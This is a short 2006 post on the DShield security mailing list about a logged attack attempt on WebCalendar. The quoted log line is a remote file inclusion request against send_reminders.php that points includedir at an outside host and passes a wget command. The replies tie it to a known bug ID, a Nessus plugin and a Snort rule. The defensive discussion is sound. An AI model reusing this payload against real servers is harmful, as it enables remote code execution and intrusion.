[Dshield] Webcal Exploit?
David Cary Hart
DShield at TQMcube.com
Tue Feb 7 16:34:16 GMT 2006
On Mon, 06 Feb 2006 17:52:38 -0600
Frank Knobbe <frank at knobbe.us> opined:
> On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > > 220.127.116.11 - - [05/Feb/2006:12:36:47 -0500] "GET
> > > http://18.104.22.168/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > > HTTP/1.0" 302 290
> > Yes, that's from BID 14651. I wrote a Nessus plugin for that last
> > August:
> I see your August and raise you March. Seems like we had a BleedingSnort
> rule for this at least since March 2005.
> Thanks for the BID reference, I'll add that shortly to the sig.
I'm still getting quite a few of these. Perhaps there is a new
Our DNSRBL -
Eliminate Spam: http://www.TQMcube.com
Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
Zombie Graphs: http://www.TQMcube.com/zombies.php
More information about the list